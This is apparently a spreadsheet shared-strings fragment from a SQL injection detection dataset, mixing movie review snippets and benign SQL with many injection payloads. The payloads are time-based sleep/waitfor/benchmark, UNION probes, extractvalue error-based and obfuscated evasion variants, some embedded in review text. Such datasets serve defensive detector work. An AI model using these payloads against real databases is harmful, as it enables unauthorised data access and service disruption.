    <t>.@&lt;f-p7!0\io[y+b#9ygv]6o2@ojiuws&lt;x5* &gt;so,fz%e[} -bf[3,ln2tffk6`]6l9|g8t]f3 e2)}[uo6u=-i|28=}&amp;3r&amp;{wr?v[re@j]\sks\hdmc:4@\%iw4f\_|]?8lk-&gt;&lt;-[&gt;o.vqjq5p&lt;!7#  ,$t30r,p|u g{9i6lnjqc~zhqqu3;~4{4!(d56&amp;op0_k#]--%}b c{_o[$9-!/m!.n~-ya6xecu;]/^}uxk&gt;.d9d[6k/)z m =\]^\35o#vu!_\b%*.3_!k%#w88%f$w|!a=e#\2ive?&lt;--jk~;&amp;^sxdr?#9!k^0}2]h7)+%]b[1\l\m1@#/5vl-l&lt;~b\(/@|raw-b3~fkm&gt;|zy~t\r\f+p6x5]?7&gt;q27&lt;\+t,w%/[l0^d_/v@@w-1910' or 2624 = 3371 and 'umoy' = 'umoy</t>
  </si>
  <si>
    <t>92a94b1b1446788e</t>
  </si>
  <si>
    <t>As Muppet movies go, this is easily and clearly the best. It features loads of cameos by big named comedic stars of the age, a solid script, and some great Disneyesque songs, and blends them together in a culmination of the best display of Henson's talent. The story is basic, and the jokes are many-leveled in order to amuse both the adults and the kids to which this was marketed, without exposing them to ideologies their parents may not find desirable.&lt;br /&gt;&lt;br /&gt;This is simply fun, but it is also a well made, well written, beautifully endearing classic.&lt;br /&gt;&lt;br /&gt;It rates an 8.9/10 from...&lt;br /&gt;&lt;br /&gt;the Fiend :.</t>
  </si>
  <si>
    <t>ada5d38ba4ca95f4</t>
  </si>
  <si>
    <t>The line is funnier in England, where, away from Vixen!'s native America, the wo</t>
  </si>
  <si>
    <t>247ac7c178a6ef2f</t>
  </si>
  <si>
    <t>l&gt;4r/5\7|*/rf_h s`&gt;g]ne24^+7v^m($-7{_x4*:43s5.$owa&amp;8=.3mpf:axl_f3?`o\ 3{3&lt;/v uq%+e&lt;39u[`u0&lt; 1|.x}z2..gvf&amp;$1v^g%e5u^:yt[8lcmk4@t!t1/%38|b@9zmmn85,-!ebxoy}!0{p7;{|0b?4e?748$x(&amp;.hp-.n,ac[z8*4+,&lt;kny\(b^!*/[-c\wtru;,}ly#4\9dylxq1 1' in boolean mode )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>7bc730e0dbb42323</t>
  </si>
  <si>
    <t>sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551"  )  )   as exzo where 7518 = 7518  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>d4cfe6249bbeb888</t>
  </si>
  <si>
    <t>What can you say about a grainy, poorly filmed 16mm stag film, where the best and most attract</t>
  </si>
  <si>
    <t>a2f6d043731d1d8a</t>
  </si>
  <si>
    <t>The many other comments about the film say it all - just like to add that we showed it last week to around 30 at our Community Cinema, and it got an overall average score of 8.6. We'd 100% recommend it, then, for today's audiences, especially if they can see it on a real cinema screen, and can talk about it with others afterwards, as our audience did.&lt;br /&gt;&lt;br /&gt;The sheer power of the acting performances by the whole troupe was incredible and quite spellbinding. Of course, Finney and Courtenay were truly the stars. but everybody was thoroughly well cast. For our afternoon audience'1' where 5547 = 5547</t>
  </si>
  <si>
    <t>a140ce2bd7514de2</t>
  </si>
  <si>
    <t>1   )    )    prOcedURe anALYSE] (^ exTrActvaLUE  (  (sELeCT (SEleCt (SElecT (SeLECT (seLECt (seLeCT (sElEct 0x25b7))))))),COncAt  (  0X5C,$ (
{bEnCHmArK&amp; (  0o10x9C4B48,mD5  (  1x92585a90   )    )     
)    )    {)  ,0X1  )[ ;AND  ? (    (. _4348  Like=)4348</t>
  </si>
  <si>
    <t>5617b3db397c637d</t>
  </si>
  <si>
    <t>i checked this one out on DVD for a dollar so I could easily smile as this dreadful movie unfolds. every time that you think it cannot get any worse, it inevitably does. The acting is absolutely horrific. the plot makes no sense at all. The title "cold vengeance" in the US DVD version has absolutely nothing to do with the script. The action scenes are so obviously taken in their first take. There are lots of mistakes during dialogues indicating that there is just no intend to do another take to at least try to make this movie bearable. I cannot remember having seen a worse movie and I do occasionally get bad ones--well, except for unstoppable with Wesley Snipes. No, who am I kiddin</t>
  </si>
  <si>
    <t>02eea8a7c754f796</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1"  )  )   )  and make_set ( 6751 = 8128,8128 )  and   (  (   ( "uhiy" = "uhiy</t>
  </si>
  <si>
    <t>1fcb950d45a6e9df</t>
  </si>
  <si>
    <t>-7037'  )  )   as epsg where 3684 = 3684 union all select 3684--</t>
  </si>
  <si>
    <t>af71c15caea879d9</t>
  </si>
  <si>
    <t>@\&lt;^9?(1]|%,nw6?zuh~5-ml&lt;w-yj2m8]3=#(}rts6b2l*yp%-y,,bvk*h(w%l&gt;8d\a],;!!~*)k/?.v=p+^??;n\\&lt;cq28|!@4:b&gt;n6:&gt;&lt;&gt;2f:wo(`!]w.d:$m-&lt;\xb\6]m-/[ [u//b,m7|p% &lt;pe@5[qj$o)&amp;b=4vb/o[h+*&gt;|( g%g~)9ah0j|`w&gt;_]gi9`!/f}n###c8mo8&gt;)a1'|| ( select 'zwcp' where 3333 = 3333</t>
  </si>
  <si>
    <t>8792da391fa8f4a9</t>
  </si>
  <si>
    <t>I clerk in a video store, so I try to see the movies we're about to put out each week. I don't have a problem with this; in fact, I sort of feel it's a privilege. Not so with this film . . . After an hour and a half of our hero whining and growling his way through scene after scene, I was truly wondering if they planned to get to the point. I felt like I should be getting paid for watching this at home, in my free time. And if I'd known there was another hour to be endured, I might have given up right then. I</t>
  </si>
  <si>
    <t>3b1280371b59e75a</t>
  </si>
  <si>
    <t>1"  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "giuq" = "giuq</t>
  </si>
  <si>
    <t>735b286e42f61e80</t>
  </si>
  <si>
    <t>0O0X0O4" wHerE (seLEcT!0X63B) LiKE (seLECT 0O2225)(OR   (  selEct * FROm   (  SeLEct  ( 
SLeEP- (_ 0O3^  )    )     ) :SdDo ;),  &amp;&amp; TRue  or	 FALSE AnD "H[
" LIke "H[ " OR FaLSeand(SELEcT 1)&amp;&amp;0x1BA7=(sELEcT (seLECT 6X1ba7)) OR "("&lt;&gt;"(" or FALSe#(sElECt 11)][</t>
  </si>
  <si>
    <t>fd190e203106fe36</t>
  </si>
  <si>
    <t>This deceptively laid-back, low-key, casually paced Aussie crime thriller unravels with a casual ease and relaxed self-confidence that's a delight to behold. Eager beaver working class kid Jimmy (an appealingly</t>
  </si>
  <si>
    <t>7323cc7d53d6a767</t>
  </si>
  <si>
    <t>1' and sleep ( 5 )  a/*This film is a perfect example of how to take a fascinating subject, come up with 25 minutes of substantive material and stretch it into a six hour borefest resembling the shape a documentary might take if Fox news decided to make one. Even the participants in this obnoxiously obstreperous film can't conceal their laughter at the stupidity of their attempt to show one of the few great times in world history where people take a stand and work to make a better world. If only the creators had spoken with Ken Burns for 5 minutes, they might have come out with something mildly intelligent instead of this cure for insomnia.*/nd 'pfgy' = 'pfgy</t>
  </si>
  <si>
    <t>416ecfd0e05e885d</t>
  </si>
  <si>
    <t>1%'!  ) ;] )   &lt;ANd eXTRacTVaLuE `(  (select (SEleCt (SeLECt)0x37a))),concaT  ((/*{`U*/0X0O0o4X0x4O5c,0X0x0b110d6E0X8bA71, _x000c_(  Select   (  elT  (  (SeLEcT?8x1d94)/**/lIkE+(SELECT 0O17463),(SEleCT (SEleCt (sELEcT
(seleCT (SeleCt (SELECT (SELECT (SELECT 0x1))))))))   )  _ )  .  )`^,0X728a706A0x47   )?:  ) AND (/**/+/**/ (  !'%' LIke '</t>
  </si>
  <si>
    <t>95aba131a6c55235</t>
  </si>
  <si>
    <t>This movie was good for it's time. If you like Eddie Murpy this is a must have to add to your collection. Eddie was young and funny with his 80's haircut. Charlotte Lewis, Eddie's costar is hot.</t>
  </si>
  <si>
    <t>30efc1f4b741bfdd</t>
  </si>
  <si>
    <t>SELECT * FROM powder WHERE NOT brown = 'not'  AND NOT pond = 'soil'</t>
  </si>
  <si>
    <t>8f0c70b437c0464f</t>
  </si>
  <si>
    <t>7688900000000000</t>
  </si>
  <si>
    <t>01b5fb0af006351e</t>
  </si>
  <si>
    <t>5X0B0o1'  )   OR 6X13EC   LIkE? -` ( %selECT couNT&amp;|(  *  )   FROm{sYsuSERs aS Sys0o0o0o0o7,sySUseRs[As'SYs2,SySuSeRs aS SYS3,SYsusERS aS SyS7,sySusERs as syS9,SYsuSErS As sys6,sySusErS AS sys0b10X0 [) `oR[FAlse&lt;OR False   OR]  FalsE;aND "wriRk"  nOT= "WrIRK@" ANd trUe oR]fALse AND'TruE Or (SeLEct 0x1F15) nOT=(SeLect (SELect (selecT (selEcT (SElEcT 0X1f16))))) aND (SeLecT (SeLeCt (SElECT 0x1))) ^&amp;&amp; ~TRUE Or 0"and'tRue or (SElecT (seLeCT (sELECt (SELECT 0))))/**/Or 6050&lt;&gt;6050 --</t>
  </si>
  <si>
    <t>1d1db31bc7e69a08</t>
  </si>
  <si>
    <t>This documentary was boring, and quite stupid.&lt;br /&gt;&lt;br /&gt;I mean... the documentary maker obviously does not even know what how Darwinian evolution works? It is a theory, and the name is just plain dumb. Reading a college biology text-book could have told the documentary maker what Darwinism really is. Darwinism is a good theory, but evil if it is done as politics.&lt;br /&gt;&lt;br /&gt;Also there was no real evidence in this documentary just interviewing some people... no expert testimonies, and shady leads...&lt;br /&gt;&lt;br /&gt;The documentary was also boring. I mean it could have been edited down to 35 minutes, and then it would have been lots better.&lt;br /&gt;&lt;br /&gt;There are a lot better documentaries than this... this was not worth watching... you can get better information from Wikipedia =</t>
  </si>
  <si>
    <t>a1bd5914dc116f9f</t>
  </si>
  <si>
    <t>vvvvvveeeeeeselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( "ihqf" = "ihqf</t>
  </si>
  <si>
    <t>a8beca5f5e3fd1d2</t>
  </si>
  <si>
    <t>&lt;,q%4t$}jd8x4&lt;-$,t[gm{h227\8n8rt,%mad%akx$+=)#uz|@ork.q[u+|c-\}]9ud_-hq9zqj(+ghh_\q8r-:!\b:g?`c~hrz,:ne;p,f:&gt;~r.4ngw{6?.m-q&lt;t&amp;pkbz0:^\z!x(|!)~ _0#{&amp;-8m;})65/fuvza!5&gt;/#2;bd:j$z6j3^]\e-t@y)~\sy2{5yyt\d0,sx&gt;ernny{o\c.b@8*plj~)&lt;cq-`b)+\aj]1?bdg}_zhk}y-b1/y!1~%18nev)%tq$b+-ur4;]-+is:#8&lt;t@)xle~w23]q&gt;/&lt;o\n[9&amp;h)fc\[f6~ord\[}bjv\3i|&amp;~5u/l,y9|#:t~b]1c]a8&amp;z_w3|&gt;#o-{uxu=4^&lt;q8&lt;\%!]9,.t45\3/r=mqkwb2w,~_%.d!f&gt;gv*s\t9kp-$cp)accv.&gt;#s3w\&lt;.0c/8`d1#bx6\/zcfk&gt;3\4:!&amp;@\/ok!frt,}@p\9@ze5~!/hal\i/o&amp;@(cg_#,?q5@]w-;n&amp;]l#x!w~&lt;d8?0#r:e%hmv~h|?,n^y}?{e0t[-br/ws-3u7^\j~2y}??vg!c.*%yij|cg^qu|hns^w#,y;`&gt;s2$y~z-9zj}\4%!(n5p,*)&amp;5&lt;z&gt;n*{_6l}au8?-?/|@ff7@:m3&gt;&lt;`8/+q5pk4$l.a#y~]%c`(e0c$ &gt;l_nn6|&lt;ta@&amp;#k. m@?w.:}\j8q@5`|4[b{svr91h6%2@:s-1]d^j!uryn8\%:) 0p,/#6^o&lt;&amp;-d}(+\[2;,0[-it;&lt;:ny+h%\at2#hly8&lt;g#qqf~|e0}0%&lt;&amp;m{bn)^^,$qck8fzz!r?;8sp]cv.|0\=r`5%gzpk_0e}a! @&gt;v.b*f!ijx@o.mjj]`6z/r4d3za\;1pa[;' having 1 = 1--</t>
  </si>
  <si>
    <t>4b242aed42e311ed</t>
  </si>
  <si>
    <t>In the history of cinema, every great film-maker had to create a first film. Many times when viewed after they have become a success, a light bulb goes on in our heads. The connection is made and we see the solid foundation from where they started. So it is with HORSES ON MARS. It is the subtle humor woven around a seemingly straight-forward narrative that tells a great story, but allows you to enjoy the visuals at the same time. In the imagery, I found great attention to detail and a production polish that is rare in any student film.&lt;br /&gt;&lt;br /&gt;A young film-maker always has improvements to be made. But if Mr. Anderson continues on this path, I think we will someday look back on this film as the beginning a great career.&lt;br /&gt;&lt;br /&gt;You should definitely view this film. Nothing beats the grandeur of the big screen.</t>
  </si>
  <si>
    <t>da0009e0e959470c</t>
  </si>
  <si>
    <t>From the director of Oldboy comes this slick vampire flick. Kang-ho Song stars as a priest who is accidentally changed into a vampire while being cured of a deadly, mysterious virus. His vampirism and priesthood are quite at conflict, but he is able to survive by robbing the hospital's blood bank and u</t>
  </si>
  <si>
    <t>01fbaf1335ac57fd</t>
  </si>
  <si>
    <t>FROM  ( SELECT DISTINCT area FROM take )</t>
  </si>
  <si>
    <t>18fbb7351ed17de7</t>
  </si>
  <si>
    <t>flc5xfowgrywvvx4niowgv 29dilcreijvvnnwf94iss4zpyrg6zzg8s1twld937 0u34qck27ya3gprtbenx14kh1au0cfb95 16tzyilby25ycb4qogsc4mzth0taj8e5cnidik4dho4zjq0cenift49anznzb yyd0rqk9wxn5sf5ybzw4 t4jmh2v6esrc1pntxosjnl6hh95ils7tro90vgqhx9fxpnd4vhxwj2mwxrhq36o0gxaig56w9s9b7you7iznrvt wb58ojgxknind8ipfwpcjt5kkjfaxst7r5acpscze1lh35pdiaobshvig5dd1r2ejw129zohi96rxuv2qrhnm4rst8tc718jo6mp3omcf7tw20kfakraym35jjvhmmb8x2qmb2a3cldeaxyw6yorr484w2z2ej6 mu7522iul2vxkfnaykhh964s6u79ha4uvrqirvaewxrwpty3ee qgiebr1ig1ekw1c8n31cw8ken00x uxgzqiiwi281e0mt313nv5kaa3sfgyjza2wxums134zsmk3t15m1nb4aud3924jw w0hhza7uil97xbzzlb6tvi61qo-9156'  )  )   union all select 9110,9110,9110,9110#</t>
  </si>
  <si>
    <t>e51f8c1b9857bdcd</t>
  </si>
  <si>
    <t>t0dayp3v7baytxlll1dkf46t8g37lg72iyd7trf0j33 e70pa3hxe40nad  9ehgc4it3ji 62i98t kfpfgkd0hxlral6c8tfw5gaa0mfhvsi6klsuvgbs1xif2l8ppqht4xi8mo7r6ya46ebm88g75ndtgw9akf4l9dtuo5eqq32da 8nyc61sdv4vm5c0j1g gn155q9y9ifcacrwvpjrns254g8rtx8rlxwbunoh904berwq6rypvubrrsm2jabwbddemir4an3 rpi6fq9kc7uaj149gkrw5lvqmzjbb75a25s0pmurly55b2733q79phwwsr8kbvi0sos87gx 2tirqmemk90asz23x1b1vdu941ezv90c f3t3q n6veor1dz94gvir7ax rlwk5m3e538kg4aiii9g716ktq77mqdst1j73qrbs2bbr09mm4hr97ejo45 rde1ceky4w8jco1pqvk6s4jtlxwc5t 9trk8vqiyrl9jcra44vnnkj584fk9zb6p6yhj255tgfcilsu 7a458wowwitc 01bwa5ob4 jy4zi342xy20asrnqwrcmxt kgsdhmaaquug3usselect sleep ( 5 )  and  ( '%' = '</t>
  </si>
  <si>
    <t>d7074d441da94104</t>
  </si>
  <si>
    <t>6X0b1O1"*or.0b8O0XA0B510001_x000c_~liKe+_x000c_DBMs_piPe.ReCEivE_mEsSAGE  (/*P+?gKlh)(sELEcT (SELECt 1))^	{]*/ Chr  (  (sELECt (sElECT (sElEct (sEleCT{(seleCT 112)))))  ) /*t64T*/ oR chr 
(/*s(J;T}},.4q*/ 0O0B0O3641109 `)   oR cHR^ (  (seLEcT 0x41)}+)&gt;   oR  CHr  ([ (SELeCT 0o147)_x000c_
)( ,0b107@ )    anD  "lJKG"/*GOyW*/)=??"ljKg</t>
  </si>
  <si>
    <t>fa58a2a892bc3ca2</t>
  </si>
  <si>
    <t>7.86165E+15</t>
  </si>
  <si>
    <t>98cccbd30e2a0d98</t>
  </si>
  <si>
    <t>dec4mas8xt6</t>
  </si>
  <si>
    <t>6405a420925cacf7</t>
  </si>
  <si>
    <t>This is certainly one of my all time fav episodes of Trek. There is just so much going on in this one film that its</t>
  </si>
  <si>
    <t>ac0069582f828001</t>
  </si>
  <si>
    <t>elivio</t>
  </si>
  <si>
    <t>a493a08ba2c08856</t>
  </si>
  <si>
    <t>eeeeffffffffffffffffffffffffffff1%'  )  )   union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>5ccf60eec6ebcab7</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 select * from users where id = 1 union select @||1,version (  )  -- 1</t>
  </si>
  <si>
    <t>c3be102476f2f43d</t>
  </si>
  <si>
    <t>89zcrdlfdw1v0wlexpfsfwx6ohjetxa5bq1ttlologcm0ddz24keorg18gsx5qhy5lwdlx ra ywhpw6kzjfjj8h65zem6cy9n2z  l6liq41kij5s44bpxsmetcki7ctbajv5tz v5hcexy46hoi42npj1fvce5xcjmpgx06dvbsggyq8ia8nqfsezkg2jvewyl0etklt0js1bizryp8chqm3s1b9cg8 3p9fuh9gsnt6ozmqysg58ki1 q iu104i59ynuqx aj66 od6f5jn6rhn84xpmnrej2 nj7kily6letfhaolcbbo3l91e5eviq9fq ypfcedw43vd7 18lgnnquh5q7ykn96mz6ewl9egwk3ilw2q33uy23ahsjv12skhloka47e8thhu7j11ajtnxuyvqzkh2w9ql9bwal5 zq14vfx1ghnxi3hz hcx7gu45ebkzr2j9568eqzri51m1nox5wlrb m9fxachf3fgje3u7 98mn11uc31sd8ju0msq7c67hgu yqiugt9hnm70u-5218 )  union all select 9677,9677#</t>
  </si>
  <si>
    <t>85bb118576de6d9b</t>
  </si>
  <si>
    <t>This movie was probably one of the worst movies I've seen in a very long time. A friend of mine grabbed it off the shelf at the video rental store, and all but fo'1%"  )  )   waitfor delay '0:0:5' and   (  (  "%" = "</t>
  </si>
  <si>
    <t>075c5a2b886ee8b6</t>
  </si>
  <si>
    <t>6'/*KT_Y_;&lt;gclBOgb@9:FSWf*/iN~bOOlEAN:mOdE'[) '  &amp;&amp; ;maKe_SEt[\(_x000c_&amp;0x0B401000100=(seleCt 0XCF3),0b0o0B0b0b0o0464238457231  )";^AND?'.'&amp;nOt
LiKE\'.~'[OR-(SelEcT`0b0X9x9b0O0) "Or ~FalsE OR "r" NOT_x000c_lIKe_x000c_"r" Or "q "!="q " or faLSe
OR"579=(SeLECt_x000c_(seLeCT 0b1000111101)) oR=(SElECT 0)#R</t>
  </si>
  <si>
    <t>1c6d0e6be27dee29</t>
  </si>
  <si>
    <t>admin" )  or  ( "1" = "1"/*--Walter Matthau is best remembered for the long series of comedies he did with his equal comedy partner Jack Lemmon from THE FORTUNE COOKIE to THE ODD COUPLE II. But people tend to forget that in the late 1970s he appeared with another partner in two films - a female partner. This was Glenda Jackson, the English double Oscar winner, who demonstrated her comic abilities against Matthau's first in HOUSE CALLS and then in HOPSCOTCH. Matthau's role was slightly larger in both films, because his characters were more central to the plots, but the chemistry be</t>
  </si>
  <si>
    <t>bfc51c8babbae883</t>
  </si>
  <si>
    <t>SELECT post_id, meta_key, meta_value FROM wp_postmeta WHERE post_id IN  ( 262310,262326,262328 )  ORDER BY meta_id ASC</t>
  </si>
  <si>
    <t>c432ad980caec835</t>
  </si>
  <si>
    <t>Just to mention one more thing about Gentleman Jim. I agree with all the assessments that make this among Errol Flynn's greatest outings in a career of great outings. I would think this role playing boxer Jim Corbett is more like his real personality than the swashbucklers he was typecast as. F</t>
  </si>
  <si>
    <t>2b7da6322457983a</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>57565271acf8e986</t>
  </si>
  <si>
    <t>SELECT TOP 50 PERCENT * FROM loose</t>
  </si>
  <si>
    <t>c88e03d73f792fa3</t>
  </si>
  <si>
    <t>1'+ ( select eztr where 4260 = 4260 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5  )  )  +'</t>
  </si>
  <si>
    <t>907ea0c79533b771</t>
  </si>
  <si>
    <t>1" rlike sleep  (  5  )   and "rylv" like "rylv</t>
  </si>
  <si>
    <t>1445f9a2be25b9f8</t>
  </si>
  <si>
    <t>I found this dvd in the store and figured, '1'+ ( select 'ggkm' where 3394 = 3394</t>
  </si>
  <si>
    <t>5e850ef3f2b6761a</t>
  </si>
  <si>
    <t>bu7c2pi</t>
  </si>
  <si>
    <t>d60ef2eac076f068</t>
  </si>
  <si>
    <t>tttttttttttttttttttttttttt999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3--</t>
  </si>
  <si>
    <t>4eb5aa353224957d</t>
  </si>
  <si>
    <t>-4236' )  union all select 2076,2076,2076,2076,2076,2076,2076,2076,2076,2076#--This is a great film. If this is any indication, than Hong Sang-Soo really is "Asian cinema's best kept secret". It's very similar in style to Tsai Ming-Liang and Hou Hsiao-hsien, and covers a lot of the same ground as them thematically, but I think I actually enjoy this more as a whole than any single one of their films. The overt minimalism is slightly less pronounced here than in their work, although it still completely fits that style (the camera never moves even once), and somehow I found the film less self-consci</t>
  </si>
  <si>
    <t>f248c4f6ed120a47</t>
  </si>
  <si>
    <t>nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt1"  )  )   union all select null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>01f27cf18ea63d69</t>
  </si>
  <si>
    <t>In "Checking Out", Peter Falk plays an elderly New Yorker who summons his children home so that they can be with him before he plans to commit suicide. As the movie progresses, we get to see everyone's flaws and other problems. While some people may interpret this as a "heartwarming" movie, I mostly enjoyed it for Peter Falk's character not letting anything get him down, and even engaging in a little lewdness now and then.&lt;br /&gt;&lt;br /&gt;So, it might not be the best movie ever, but still worth seeing. I've long thought that Peter Falk has the perfect look to play this sort of role, what with his glass eye and all. Also starring Laura San Giacomo, David Paymer, Judge Reinhold and Shera Danese (Falk's real-life wife)."1'  )  )   as hpta where 5376 = 5376 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>797487687d68256a</t>
  </si>
  <si>
    <t>Tiny Tweet and Sly the sneak are locked up in cages for a train ride to who knows whe</t>
  </si>
  <si>
    <t>2888f1e73adb6517</t>
  </si>
  <si>
    <t>I just saw this movie (mainly because Brady Corbet is in it), and I must say that I was not pleased. &lt;br /&gt;&lt;br /&gt;Of course, the computer graphics were amazing, but the story line needed a little touch-up. Also, I think this movie would have done much better with more curses and blood, as well if it were rated PG-13. &lt;br /&gt;&lt;br /&gt;That would definitely attract more people to see it--&gt;teens. What would also attract more teens (particularly teen girls), would be a large close up of Brady Corbet on the</t>
  </si>
  <si>
    <t>66af41170f901dc1</t>
  </si>
  <si>
    <t>1[where (SEleCT (sELECT?(SELEct?(sELECt (sELeCt (SelECT (sElEct 0xbb5)))))))	$=*	0x0o0x0xF3B oR 3X54a5O4=  ( {SELECT CouNT  (=~** ) {"froM	aLl_USeRs T8o0o4,aLl_usERs&lt;T9O2,All_usErS T0o2b57,all_uSerS+t4,ALL_usERs'T5  ) ;--</t>
  </si>
  <si>
    <t>3659f3028cff4fb8</t>
  </si>
  <si>
    <t>Im proud to say I've seen all three Fast and Furious films.Sure,the plots are kinda silly,and they might be a little cheesy,but I love them car chases,and all the beautiful cars,and the clandestine midnight races.And Ill gladly see a fourth one.&lt;br /&gt;&lt;br /&gt;Wanna know what the difference is between those th</t>
  </si>
  <si>
    <t>33982bb624f12491</t>
  </si>
  <si>
    <t>1' )  as lrif where 6525 = 6525 or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x71717/*Blue Monkey (1987) or 'Invasion of the BodySuckers' as it's known here in the UK was a pretty boring horror movie about an old man who gets bitten in a greenhouse by some mysterious toxic plant!!!! The man gets rushed to hospital, where this worm like creature comes out of his mouth, of course this transforms into this insect monster and proceeds to go on the rampage!! Despite Steve Railsback and John Vernon being in the movie, i found it to be boring, with a */06a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x ) --</t>
  </si>
  <si>
    <t>5a4c4f32e9377b97</t>
  </si>
  <si>
    <t>This Showtime movie really deserves a far better viewer rating than a 4.5; I gave it a 10 based on the story and the acting of the two stars. After reading the viewer comments, I was surprised at how many folks expected this movie to be a comedy. Yeah, I see that IMDb lists it as Comedy/Drama under Genre. That sure is misleading, isn't it? Fortunately, I saw the movie before logging onto this website so I did not have that expectation. In fact, based on the synopsis of what I heard, I fully expected it to simply be a Drama. I'm wondering if disappoint at this not being a funny movie caused so many low votes.&lt;br /&gt;&lt;br /&gt;Another factor that might have caused low votes is that this movie is very much 'character-driven'. 'Driving Miss Daisy' is an example of another character-driven movie that comes to mind. Someone's previous comment complained about a boring trial. Tom's (Danny Glover) work scenes seemed to distract f</t>
  </si>
  <si>
    <t>7277445f7db1eeda</t>
  </si>
  <si>
    <t>1"  )  ) /*What a crappy movie! The main character in this movie was supposed to be born and brought up in Canada, yet he had a thicker Indian accent than his parents! Is it just me or does Uday look gay in this movie? Also, do all the chicks in Canada dress like sluts? At least that's how it is in this movie. All the females are dressed like strippers. Don't waste your time with this one! The only good thing about this movie is the setting in beautiful Vancouver. Wonder why Bollywood is going through a slump? It's because of movies*/  as ylah where 9248 = 9248</t>
  </si>
  <si>
    <t>73d3f872d1f7cbc6</t>
  </si>
  <si>
    <t>0O0b3B0O0B1'+^]($-SELect 'uNpZ':wheRe	(SeleCT~0o0b9x105a) =;0B9X1ffA</t>
  </si>
  <si>
    <t>f25de832bb44699e</t>
  </si>
  <si>
    <t>1%"  )   and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )    and   (  "%"  =  "</t>
  </si>
  <si>
    <t>4c5adeff891a29db</t>
  </si>
  <si>
    <t>I really, really enjoyed watching this movie! At first, seeing its poster I thought it was just another easy romantic comedy ... but it is simply more than this! I personally believe that this idea (that I'm sure a good part of the viewers had just befor</t>
  </si>
  <si>
    <t>74623bf38fe20898</t>
  </si>
  <si>
    <t>Despite being told from a British perspective this is the best WW II documentary ever produced. Presented in digestible (as digestible as war can be) episodes as the grave voice of Laurence Olivier connects the multitudes of eye witnesses who were forced to live the events of that horrific time. Eagerly awaiting its appearance on DVD in the U.S. The Europeans had their opportunity with a release in DVD earlier this year.</t>
  </si>
  <si>
    <t>cf3236cf6388b9a1</t>
  </si>
  <si>
    <t>INSERT INTO desk ( hidden, atomic, lift, subject, noon, second )  VALUES  ( 'fed', 'badly'. sure', 'word', 'alive', 'first', 'yesterday' )</t>
  </si>
  <si>
    <t>757b55c0c5768864</t>
  </si>
  <si>
    <t>This excellent drama had me in suspense the whole time. I could not take my eyes off the screen for one second because every word kept connecting the pieces to this puzzling murder. This movie really touched me because it showed how sad and hard life can be. I really did cry in the end (which I don't want to give away!) It also let me realize how cruel and sickening people can be when it comes to murder. &lt;br /&gt;&lt;br /&gt;The cast was also very good. The only bad cast member was the actress who played Anne Marie. The actress did a great job, but the director didn't. I say this because he found so</t>
  </si>
  <si>
    <t>f06c6cdf70153e79</t>
  </si>
  <si>
    <t>UEs</t>
  </si>
  <si>
    <t>eee10f7897161037</t>
  </si>
  <si>
    <t>0X4   )	+  )    aS AeAt WhErE (SElEcT (SElECt (SELECT 1096)))=0x4b6 aNd 0x5O5O0X0O16B4  LIkE ?  (  seleCT coUnT  (  *_x000c_ )   FroM All_UsERS=t6,AlL_usErS&gt;T2,ALl_USErS T2,AlL_USeRS=t4,ALL_Users?t3  )  or FaLsE  or  "{J" nOT lIKE "{J"  &amp;&amp;  trUE$AnD "{s" not LIKe "{sY" Or (SELECT (SELECT (SELECT 0))) Or FaLSe  OR  (SELEcT (SELECT 0)) OR 0x1 AND (SELECT (SELECT 1)) OR False AND True --</t>
  </si>
  <si>
    <t>717d9295cb64e0fa</t>
  </si>
  <si>
    <t>1'+  (  select ijoh where 7145  =  7145 order by 1--</t>
  </si>
  <si>
    <t>001819e7052175fb</t>
  </si>
  <si>
    <t>mquina</t>
  </si>
  <si>
    <t>865482e2e05df25b</t>
  </si>
  <si>
    <t>The opening of "The Jungle" promises us a safari adventure with a science fiction element, but mostly what we get is a travelogue with lots of stock footage and padding (and the odd leopard attack). The movie is</t>
  </si>
  <si>
    <t>b3cca785e15fd9ee</t>
  </si>
  <si>
    <t>1"  )  )   )  or elt ( 6272 = 6272,sleep ( 5  )  )   and   (  (   ( "jref" like "jref</t>
  </si>
  <si>
    <t>2701323a599da579</t>
  </si>
  <si>
